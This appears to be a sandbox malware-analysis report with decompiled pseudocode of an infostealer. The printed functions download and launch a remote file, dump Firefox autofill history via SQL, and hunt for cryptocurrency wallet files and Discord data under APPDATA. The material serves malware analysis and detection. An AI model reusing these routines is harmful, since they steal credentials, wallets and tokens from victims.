                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$_strtok_slstrcat
                                                                                • String ID: true
                                                                                • API String ID: 3121452665-4261170317
                                                                                • Opcode ID: 010495f5d40d47203e122d1f4fb58f1cc23d2e6d5d86598d96ebf1b64298457c
                                                                                • Instruction ID: eb98f98bd5ec430971a32dc915a3c209b48caa516c0126fac566ab52d8cbfe18
                                                                                • Opcode Fuzzy Hash: 010495f5d40d47203e122d1f4fb58f1cc23d2e6d5d86598d96ebf1b64298457c
                                                                                • Instruction Fuzzy Hash: DB513CB2D1052DEECF209B60EC85CDAB77DAB55349B4004FAB10DEA141D6389F868F65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,00000000,0041CC5C,?,00440C98,?,00000000), ref: 0041C061
                                                                                • StrCmpCA.SHLWAPI(00000000,00442A80), ref: 0041C089
                                                                                • StrCmpCA.SHLWAPI(00000000,.zip), ref: 0041C09D
                                                                                • StrCmpCA.SHLWAPI(00000000,.zoo), ref: 0041C0AD
                                                                                • StrCmpCA.SHLWAPI(00000000,.arc), ref: 0041C0BD
                                                                                • StrCmpCA.SHLWAPI(00000000,.lzh), ref: 0041C0CD
                                                                                • StrCmpCA.SHLWAPI(00000000,.arj), ref: 0041C0DD
                                                                                • StrCmpCA.SHLWAPI(00000000,.gz), ref: 0041C0ED
                                                                                • StrCmpCA.SHLWAPI(00000000,.tgz), ref: 0041C0FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                • API String ID: 1659193697-51310709
                                                                                • Opcode ID: 6cd89107c9b25a76d121727b03043ab714471eed10fed4fe3570d2c52fbef4ad
                                                                                • Instruction ID: f3f8eadf38d2d01ace3f20948d054dfb57502fe24134cf8a390a1adf9d844e14
                                                                                • Opcode Fuzzy Hash: 6cd89107c9b25a76d121727b03043ab714471eed10fed4fe3570d2c52fbef4ad
                                                                                • Instruction Fuzzy Hash: 871165347C0B21A6AB311B75BC89FDB3F545F07F417184026FC49A1190D79C95C2A6AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 48%
                                                                                			E0040E67C(char* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t35;
                                                                                				int _t38;
                                                                                				char* _t61;
                                                                                				void* _t62;
                                                                                				void* _t67;
                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                				void* _t74;
                                                                                				signed int _t75;
                                                                                				void* _t77;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t75 = _t77 - 0x4a4;
                                                                                				_t35 =  *0x447674; // 0x4124c941
                                                                                				 *(_t75 + 0x4a0) = _t35 ^ _t75;
                                                                                				_t61 = __ecx;
                                                                                				 *(_t75 - 0x80) =  *(_t75 + 0x4ac);
                                                                                				 *(_t75 - 0x74) = 0;
                                                                                				 *(_t75 - 0x78) = 0x100;
                                                                                				_t38 = InternetOpenA(0x43e028, 1, 0, 0, 0);
                                                                                				 *(_t75 - 0x70) = _t38;
                                                                                				if(_t38 != 0) {
                                                                                					_push("https");
                                                                                					_push(E0040E608(__ecx, 0x100, 0));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						 *(_t75 - 0x74) = 1;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t75 - 0x6c)) = 0;
                                                                                					do {
                                                                                						_push(0);
                                                                                						if( *(_t75 - 0x74) == 0) {
                                                                                							_push(0x100);
                                                                                						} else {
                                                                                							_push(0x800100);
                                                                                						}
                                                                                						 *(_t75 - 0x64) = InternetOpenUrlA( *(_t75 - 0x70), _t61, 0, 0, ??, ??);
                                                                                						if(HttpQueryInfoA( *(_t75 - 0x64), 0x13, _t75 + 0x3a0, _t75 - 0x78, 0) == 0) {
                                                                                							goto L10;
                                                                                						} else {
                                                                                							_push("200");
                                                                                							_push(_t75 + 0x3a0);
                                                                                							if( *0x44a1d8() != 0) {
                                                                                								Sleep(0x3e8);
                                                                                								goto L10;
                                                                                							}
                                                                                						}
                                                                                						break;
                                                                                						L10:
                                                                                						 *((intOrPtr*)(_t75 - 0x6c)) =  *((intOrPtr*)(_t75 - 0x6c)) + 1;
                                                                                					} while ( *((intOrPtr*)(_t75 - 0x6c)) < 3);
                                                                                					_t71 = CreateFileA( *(_t75 - 0x80), 0x40000000, 3, 0, 2, 0x80, 0);
                                                                                					while(InternetReadFile( *(_t75 - 0x64), _t75 - 0x60, 0x400, _t75 - 0x68) != 0) {
                                                                                						if( *(_t75 - 0x68) <= 0 || WriteFile(_t71, _t75 - 0x60,  *(_t75 - 0x68), _t75 - 0x7c, 0) != 0 &&  *(_t75 - 0x68) ==  *(_t75 - 0x7c)) {
                                                                                							if( *(_t75 - 0x68) >= 0x400) {
                                                                                								continue;
                                                                                							}
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					E00427E30(_t75 - 0x60, 0, 0x400);
                                                                                					CloseHandle(_t71);
                                                                                					InternetCloseHandle( *(_t75 - 0x64));
                                                                                					_t38 = InternetCloseHandle( *(_t75 - 0x70));
                                                                                				}
                                                                                				_pop(_t70);
                                                                                				_pop(_t74);
                                                                                				_pop(_t62);
                                                                                				return E0041DEB4(_t38, _t62,  *(_t75 + 0x4a0) ^ _t75, _t67, _t70, _t74);
                                                                                			}

















                                                                                APIs
                                                                                • InternetOpenA.WININET(0043E028,00000001,00000000,00000000,00000000), ref: 0040E6BC
                                                                                  • Part of subcall function 0040E608: _memset.LIBCMT ref: 0040E623
                                                                                  • Part of subcall function 0040E608: _memset.LIBCMT ref: 0040E630
                                                                                  • Part of subcall function 0040E608: lstrlenA.KERNEL32(?,10000000,?), ref: 0040E656
                                                                                  • Part of subcall function 0040E608: InternetCrackUrlA.WININET(?,00000000,?,10000000), ref: 0040E65E
                                                                                • StrCmpCA.SHLWAPI(00000000,https,?,00000000), ref: 0040E6D8
                                                                                • InternetOpenUrlA.WININET(?,?,00000000,00000000,00000100,00000000), ref: 0040E700
                                                                                • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040E71A
                                                                                • StrCmpCA.SHLWAPI(?,200,?,00000000), ref: 0040E730
                                                                                • Sleep.KERNEL32(000003E8,?,00000000), ref: 0040E73F
                                                                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000,?,00000000), ref: 0040E761
                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000000), ref: 0040E782
                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 0040E7A5
                                                                                • _memset.LIBCMT ref: 0040E7B5
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040E7BE
                                                                                • InternetCloseHandle.WININET(?), ref: 0040E7C7
                                                                                • InternetCloseHandle.WININET(?), ref: 0040E7D0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseFileHandle_memset$Open$CrackCreateHttpInfoQueryReadSleepWritelstrlen
                                                                                • String ID: 200$https
                                                                                • API String ID: 1246493084-2945048398
                                                                                • Opcode ID: 2166902c2538bca1afb59c9871c25a592ac0c21d90d17c72aab791548218289a
                                                                                • Instruction ID: cd48dd3fe015acc541eedf6a26b47031311dbc4bd5b6e07b5c36a9c67a77faee
                                                                                • Opcode Fuzzy Hash: 2166902c2538bca1afb59c9871c25a592ac0c21d90d17c72aab791548218289a
                                                                                • Instruction Fuzzy Hash: B5415971A40218AFDB209FA2DC88EEEBBBCFF46714F10042AF509E7191D6785914DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00407E57(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t42;
                                                                                				short _t48;
                                                                                				intOrPtr _t49;
                                                                                				CHAR* _t50;
                                                                                				void* _t53;
                                                                                				int _t55;
                                                                                				intOrPtr* _t58;
                                                                                				CHAR* _t77;
                                                                                				void* _t80;
                                                                                				void* _t91;
                                                                                				void* _t94;
                                                                                				void* _t96;
                                                                                				signed int _t97;
                                                                                				void* _t99;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                
                                                                                				_t95 = __esi;
                                                                                				_t91 = __edx;
                                                                                				_t100 = _t99 - 0x120;
                                                                                				_t97 = _t100 - 4;
                                                                                				_t42 =  *0x447674; // 0x4124c941
                                                                                				 *(_t97 + 0x120) = _t42 ^ _t97;
                                                                                				_push(0x48);
                                                                                				E00421975(E004363D7, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t97 - 4)) = 0;
                                                                                				E00427E30(_t97 + 0x1c, 0, 0x104);
                                                                                				_t101 = _t100 + 0xc;
                                                                                				_t48 = 0x3b;
                                                                                				 *((short*)(_t97 - 0x10)) = _t48;
                                                                                				_t49 =  *((intOrPtr*)(_t97 + 0x12c));
                                                                                				if( *((intOrPtr*)(_t97 + 0x140)) < 0x10) {
                                                                                					_t49 = _t97 + 0x12c;
                                                                                				}
                                                                                				_t50 = E0041F145(0, _t91, 0x104, _t49, _t97 - 0x10, _t97 - 0x18);
                                                                                				_t102 = _t101 + 0xc;
                                                                                				 *(_t97 - 0x14) = _t50;
                                                                                				if(_t50 != 0) {
                                                                                					do {
                                                                                						_t55 = lstrlenA( *(_t97 - 0x14));
                                                                                						_t108 = _t55 - 5;
                                                                                						if(_t55 > 5) {
                                                                                							 *0x44a1b8(_t97 + 0x1c,  *0x449ee0);
                                                                                							_push(0x14);
                                                                                							_t58 = E00417368(0, _t97, _t91, 0x104, _t95, _t108);
                                                                                							 *((char*)(_t97 - 4)) = 1;
                                                                                							if( *((intOrPtr*)(_t58 + 0x14)) >= 0x10) {
                                                                                								_t58 =  *_t58;
                                                                                							}
                                                                                							 *0x44a1b8(_t97 + 0x1c, _t58);
                                                                                							 *((char*)(_t97 - 4)) = 0;
                                                                                							E00402C34(_t97, 1, 0);
                                                                                							 *0x44a1b8(_t97 + 0x1c,  *0x449dd8);
                                                                                							E0040E67C( *(_t97 - 0x14), _t91);
                                                                                							E00427E30(_t97 - 0x54, 0, 0x3c);
                                                                                							 *((intOrPtr*)(_t97 - 0x44)) = _t97 + 0x1c;
                                                                                							 *((intOrPtr*)(_t97 - 0x54)) = 0x3c;
                                                                                							 *((intOrPtr*)(_t97 - 0x50)) = 0;
                                                                                							 *((intOrPtr*)(_t97 - 0x4c)) = 0;
                                                                                							 *(_t97 - 0x48) = "open";
                                                                                							 *((intOrPtr*)(_t97 - 0x40)) = 0x43e028;
                                                                                							 *((intOrPtr*)(_t97 - 0x3c)) = 0;
                                                                                							 *((intOrPtr*)(_t97 - 0x38)) = 5;
                                                                                							 *((intOrPtr*)(_t97 - 0x34)) = 0;
                                                                                							 *0x44a1f8(_t97 - 0x54, _t97 + 0x1c);
                                                                                							E00427E30(_t97 - 0x54, 0, 0x3c);
                                                                                							E00427E30(_t97 + 0x1c, 0, 0x104);
                                                                                							_t77 = E0041F145(0, _t91, 0x104, 0, _t97 - 0x10, _t97 - 0x18);
                                                                                							_t102 = _t102 + 0x34;
                                                                                							 *(_t97 - 0x14) = _t77;
                                                                                						}
                                                                                					} while ( *(_t97 - 0x14) != 0);
                                                                                				}
                                                                                				 *0x44a340 = 1;
                                                                                				_t53 = E00402C34(_t97 + 0x12c, 1, 0);
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t97 - 0xc));
                                                                                				_pop(_t94);
                                                                                				_pop(_t96);
                                                                                				_pop(_t80);
                                                                                				return E0041DEB4(_t53, _t80,  *(_t97 + 0x120) ^ _t97, _t91, _t94, _t96);
                                                                                			}






















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$lstrcat$_strtok_s$ExecuteH_prolog3Shelllstrlen
                                                                                • String ID: (C
                                                                                • API String ID: 403364113-3375610692
                                                                                • Opcode ID: 7f17d65ac0e168acf629745cbc711c2fc097131cc66965550252424a90f2d50b
                                                                                • Instruction ID: 7b9a904dc1d93ea48c18e3dad43512a8569cd8173603b5d985684eb9963d7091
                                                                                • Opcode Fuzzy Hash: 7f17d65ac0e168acf629745cbc711c2fc097131cc66965550252424a90f2d50b
                                                                                • Instruction Fuzzy Hash: 31412BB1D0424DAFDB14DFE0DC85AEEB7B8FB09304F40442AE505A7281E7789A59CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00410D54(CHAR* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t39;
                                                                                				int _t41;
                                                                                				void* _t44;
                                                                                				void* _t49;
                                                                                				void* _t50;
                                                                                				void* _t55;
                                                                                				void* _t57;
                                                                                				void* _t68;
                                                                                				CHAR* _t69;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				signed int _t76;
                                                                                				void* _t78;
                                                                                				void* _t80;
                                                                                				void* _t82;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t76 = _t78 - 0x198;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t76 + 0x194) = _t24 ^ _t76;
                                                                                				 *((intOrPtr*)(_t76 - 0x80)) =  *((intOrPtr*)(_t76 + 0x1a0));
                                                                                				_t69 = __ecx;
                                                                                				_t56 = __edx;
                                                                                				GetCurrentDirectoryA(0x104, _t76 + 0x90);
                                                                                				 *0x44a1b8(_t76 + 0x90, "\\temp", _t68, _t72, _t55);
                                                                                				CopyFileA(_t69, _t76 + 0x90, 1);
                                                                                				E00427E30(_t76 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t76 - 0x74, "Autofill\\%s_%s.txt",  *((intOrPtr*)(_t76 - 0x80)), _t56);
                                                                                				_t39 =  *0x44a0a4(_t76 + 0x90, _t76 - 0x7c);
                                                                                				_t80 = _t78 - 0x218 + 0x24;
                                                                                				if(_t39 == 0) {
                                                                                					_t44 =  *0x44a058( *((intOrPtr*)(_t76 - 0x7c)), "SELECT fieldname, value FROM moz_formhistory", 0xffffffff, _t76 - 0x78, 0);
                                                                                					_t82 = _t80 + 0x14;
                                                                                					if(_t44 == 0) {
                                                                                						_t75 = E00420300(_t76 - 0x74, "w");
                                                                                						if(_t75 != 0) {
                                                                                							_t49 =  *0x44a074( *((intOrPtr*)(_t76 - 0x78)));
                                                                                							while(1) {
                                                                                								_t86 = _t49 - 0x64;
                                                                                								if(_t49 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								_t50 =  *0x44a094( *((intOrPtr*)(_t76 - 0x78)), 0);
                                                                                								_t56 = _t50;
                                                                                								E0041E879(_t50, 0, _t75, __eflags);
                                                                                								E0041E879(_t50, 0, _t75, __eflags);
                                                                                								_t49 =  *0x44a074( *((intOrPtr*)(_t76 - 0x78)), _t75, "\n", _t75, "%s\t%s", _t50,  *0x44a094( *((intOrPtr*)(_t76 - 0x78)), 1));
                                                                                								_t82 = _t82 + 0x2c;
                                                                                							}
                                                                                							_push(_t75);
                                                                                							E0041EAA2(_t56, 0, _t75, _t86);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t76 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t76 - 0x7c)));
                                                                                				}
                                                                                				_t41 = DeleteFileA(_t76 + 0x90);
                                                                                				_pop(_t71);
                                                                                				_pop(_t74);
                                                                                				_pop(_t57);
                                                                                				return E0041DEB4(_t41, _t57,  *(_t76 + 0x194) ^ _t76, _t67, _t71, _t74);
                                                                                			}


























                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetlstrcatwsprintf
                                                                                • String ID: %s%s$(>A(C$Autofill\%s_%s.txt$SELECT fieldname, value FROM moz_formhistory$\temp
                                                                                • API String ID: 3845412190-3770164209
                                                                                • Opcode ID: e44210951bee8055899ec79d70d4a1b528f5e3fbaf2fb05f7806a62cf646611b
                                                                                • Instruction ID: 032f60a57976095649d428e1fe611b592d31abf26e0f6a1b5b49816b837eed00
                                                                                • Opcode Fuzzy Hash: e44210951bee8055899ec79d70d4a1b528f5e3fbaf2fb05f7806a62cf646611b
                                                                                • Instruction Fuzzy Hash: 2C317376940208AFEB209FB5EC49EDE7BBCEF09304F10013BF609E3151DA7999948B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
                                                                                			E00408FB7(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t51;
                                                                                				intOrPtr* _t73;
                                                                                				void* _t77;
                                                                                				void* _t78;
                                                                                				intOrPtr _t80;
                                                                                				void* _t83;
                                                                                				void* _t86;
                                                                                
                                                                                				_t86 = __eflags;
                                                                                				E004219DE(E00436B5B, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t77 - 4)) = 0;
                                                                                				E00427E30(_t77 - 0x118, 0, 0x104);
                                                                                				 *0x44a1b8(_t77 - 0x118, E0041F644(0, __edi, 0x104, _t86), "APPDATA", 0x358);
                                                                                				_t80 = _t78 + 0xc - 0x1c;
                                                                                				 *((intOrPtr*)(_t77 - 0x364)) = _t80;
                                                                                				E0040D337(0, _t77 + 8, 0x104, _t86);
                                                                                				E0040895E(0, _t77 + 8, 0x104, _t86);
                                                                                				E00427E30(_t77 - 0x328, 0, 0x104);
                                                                                				 *0x44a1b8(_t77 - 0x328, E0041F644(0, _t77 + 8, 0x104, _t86),  *0x449e58, _t80,  *0x449b84, 0x43e028, _t77 - 0x118, "*allet*.dat");
                                                                                				E00427E30(_t77 - 0x220, 0, 0x104);
                                                                                				 *0x44a1b8(_t77 - 0x220, E0041F644(0, _t77 + 8, 0x104, _t86),  *0x449ea8);
                                                                                				 *((intOrPtr*)(_t77 - 0x330)) = 0xf;
                                                                                				 *((intOrPtr*)(_t77 - 0x334)) = 0;
                                                                                				 *((char*)(_t77 - 0x344)) = 0;
                                                                                				E00403A16(_t77 - 0x344, _t86, "\\discord\\", 9);
                                                                                				 *((char*)(_t77 - 4)) = 1;
                                                                                				_t51 = E0040D3FA(_t77 - 0x344, _t77 - 0x360, _t77 - 0x220, _t77 - 0x344);
                                                                                				_t83 = _t80 + 0x4c;
                                                                                				 *((char*)(_t77 - 4)) = 2;
                                                                                				_t87 =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t51 + 0x14)) < 0x10) {
                                                                                					_t73 = _t51;
                                                                                				} else {
                                                                                					_t73 =  *_t51;
                                                                                				}
                                                                                				_t84 = _t83 - 0x1c;
                                                                                				 *((intOrPtr*)(_t77 - 0x364)) = _t83 - 0x1c;
                                                                                				E0040410F(_t83 - 0x1c, _t77 + 8);
                                                                                				E00408D8A(0, _t73, _t73, _t84, _t87);
                                                                                				E00402C34(_t77 - 0x360, 1, 0);
                                                                                				E00402C34(_t77 - 0x344, 1, 0);
                                                                                				E00402C34(_t77 + 8, 1, 0);
                                                                                				return E00421A61(0, _t73, _t84);
                                                                                			}











                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00408FC1
                                                                                • _memset.LIBCMT ref: 00408FD9
                                                                                • __wgetenv.LIBCMT ref: 00408FE6
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00408FF4
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                  • Part of subcall function 0040895E: __EH_prolog3_GS.LIBCMT ref: 00408968
                                                                                  • Part of subcall function 0040895E: wsprintfA.USER32 ref: 00408994
                                                                                  • Part of subcall function 0040895E: FindFirstFileA.KERNEL32(?,?), ref: 004089AB
                                                                                  • Part of subcall function 0040895E: StrCmpCA.SHLWAPI(?,00440CA4), ref: 004089CC
                                                                                  • Part of subcall function 0040895E: StrCmpCA.SHLWAPI(?,00440CA8), ref: 004089E6
                                                                                  • Part of subcall function 0040895E: wsprintfA.USER32 ref: 00408A0E
                                                                                  • Part of subcall function 0040895E: StrCmpCA.SHLWAPI(?,0043E028), ref: 00408A1D
                                                                                  • Part of subcall function 0040895E: wsprintfA.USER32 ref: 00408A3A
                                                                                  • Part of subcall function 0040895E: PathMatchSpecA.SHLWAPI(?,?), ref: 00408A5E
                                                                                  • Part of subcall function 0040895E: CopyFileA.KERNEL32 ref: 00408AD5
                                                                                • _memset.LIBCMT ref: 00409035
                                                                                • __wgetenv.LIBCMT ref: 00409043
                                                                                  • Part of subcall function 0041F644: _strnlen.LIBCMT ref: 0041F679
                                                                                  • Part of subcall function 0041F644: __lock.LIBCMT ref: 0041F68A
                                                                                  • Part of subcall function 0041F644: __getenv_helper_nolock.LIBCMT ref: 0041F697
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00409051
                                                                                • _memset.LIBCMT ref: 00409060
                                                                                • __wgetenv.LIBCMT ref: 0040906E
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040907C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __wgetenv_memsetlstrcatwsprintf$FileH_prolog3_$CopyFindFirstH_prolog3MatchPathSpec__getenv_helper_nolock__lock_strnlen
                                                                                • String ID: *allet*.dat$APPDATA$\discord\
                                                                                • API String ID: 3432118877-3186974363
                                                                                • Opcode ID: e4fe5853c59407932ed28206c7e5e32b80d0095f0245b93bb1e551d1452204e1
                                                                                • Instruction ID: fe099da6a48e5303d583074f27277eb26aa91eca6a9e2f70898cdbe9ee9ffaee
                                                                                • Opcode Fuzzy Hash: e4fe5853c59407932ed28206c7e5e32b80d0095f0245b93bb1e551d1452204e1
                                                                                • Instruction Fuzzy Hash: 9E3196B2D0111CBFDB15EBA0DD46ADE777CAB04304F0400FAF509A6092DA799F898B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E004112DA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t167;
                                                                                				void* _t169;
                                                                                				void* _t171;
                                                                                				WCHAR* _t172;
                                                                                				signed char _t173;
                                                                                				void* _t179;
                                                                                				void* _t181;
                                                                                				void* _t183;
                                                                                				intOrPtr _t189;
                                                                                				intOrPtr* _t190;
                                                                                				intOrPtr _t191;
                                                                                				signed int _t205;
                                                                                				intOrPtr _t215;
                                                                                				void* _t226;
                                                                                				intOrPtr* _t227;
                                                                                				void* _t231;
                                                                                				void* _t233;
                                                                                				void* _t248;
                                                                                				char _t285;
                                                                                				void* _t290;
                                                                                				intOrPtr _t311;
                                                                                				intOrPtr _t312;
                                                                                				intOrPtr _t314;
                                                                                				intOrPtr _t315;
                                                                                				intOrPtr _t317;
                                                                                				intOrPtr _t318;
                                                                                				intOrPtr _t320;
                                                                                				intOrPtr _t321;
                                                                                				void* _t331;
                                                                                				void* _t332;
                                                                                				void* _t333;
                                                                                				void* _t334;
                                                                                				void* _t344;
                                                                                				void* _t346;
                                                                                				void* _t348;
                                                                                				void* _t353;
                                                                                				void* _t354;
                                                                                				void* _t356;
                                                                                				intOrPtr _t358;
                                                                                				void* _t359;
                                                                                				void* _t360;
                                                                                				void* _t361;
                                                                                				void* _t362;
                                                                                
                                                                                				_t362 = __eflags;
                                                                                				_t330 = __edx;
                                                                                				_t290 = __ecx;
                                                                                				_push(0x204);
                                                                                				E004219DE(E00436B15, __ebx, __edi, __esi);
                                                                                				_t167 = E00415BB2(__ebx, __edi, _t353 - 0xd4, _t362);
                                                                                				_t285 = 0;
                                                                                				 *(_t353 - 4) = 0;
                                                                                				_t169 = E0040D3FA(_t290, _t353 - 0xb8,  *0x449e74, _t167);
                                                                                				 *(_t353 - 4) = 1;
                                                                                				_t171 = E0040D3C3(_t290, _t353 - 0xf0, _t169,  *0x449c1c);
                                                                                				_t356 = _t354 + 0x18;
                                                                                				 *(_t353 - 4) = 2;
                                                                                				_t172 = E004175C4(_t171, _t353 - 0x10c);
                                                                                				if(_t172[0xa] >= 8) {
                                                                                					_t172 =  *_t172;
                                                                                				}
                                                                                				_t173 = GetFileAttributesW(_t172);
                                                                                				if(_t173 == 0xffffffff) {
                                                                                					L4:
                                                                                					 *((intOrPtr*)(_t353 - 0x148)) = _t285;
                                                                                					L5:
                                                                                					_t340 = _t353 - 0x10c;
                                                                                					E00403960(0, _t353 - 0x10c, 1);
                                                                                					_t337 = 1;
                                                                                					E00402C34(_t353 - 0xf0, 1, _t285);
                                                                                					E00402C34(_t353 - 0xb8, 1, _t285);
                                                                                					 *(_t353 - 4) =  *(_t353 - 4) | 0xffffffff;
                                                                                					_t294 = _t353 - 0xd4;
                                                                                					E00402C34(_t353 - 0xd4, 1, _t285);
                                                                                					_t366 =  *((intOrPtr*)(_t353 - 0x148)) - _t285;
                                                                                					if( *((intOrPtr*)(_t353 - 0x148)) == _t285) {
                                                                                						L46:
                                                                                						return E00421A61(_t285, _t337, _t340);
                                                                                					} else {
                                                                                						_t179 = E00415BB2(_t285, 1, _t353 - 0xf0, _t366);
                                                                                						 *(_t353 - 4) = 3;
                                                                                						_t181 = E0040D3FA(_t294, _t353 - 0xb8,  *0x449e74, _t179);
                                                                                						 *(_t353 - 4) = 4;
                                                                                						_t183 = E0040D3C3(_t294, _t353 - 0xd4, _t181,  *0x449c1c);
                                                                                						_t358 = _t356 + 0x18;
                                                                                						_push(_t183);
                                                                                						_push(_t353 - 0x210);
                                                                                						 *(_t353 - 4) = 5;
                                                                                						E0041443B(_t285, 1, _t353 - 0xf0, _t366);
                                                                                						E00402C34(_t353 - 0xd4, 1, _t285);
                                                                                						E00402C34(_t353 - 0xb8, 1, _t285);
                                                                                						E00402C34(_t353 - 0xf0, 1, _t285);
                                                                                						_t189 = 0xf;
                                                                                						 *((intOrPtr*)(_t353 - 0x18)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x1c)) = _t285;
                                                                                						 *((char*)(_t353 - 0x2c)) = _t285;
                                                                                						 *((intOrPtr*)(_t353 - 0x14c)) = _t285;
                                                                                						 *((intOrPtr*)(_t353 - 0x88)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x8c)) = _t285;
                                                                                						 *(_t353 - 0x9c) = _t285;
                                                                                						 *((intOrPtr*)(_t353 - 0x6c)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x70)) = _t285;
                                                                                						 *(_t353 - 0x80) = _t285;
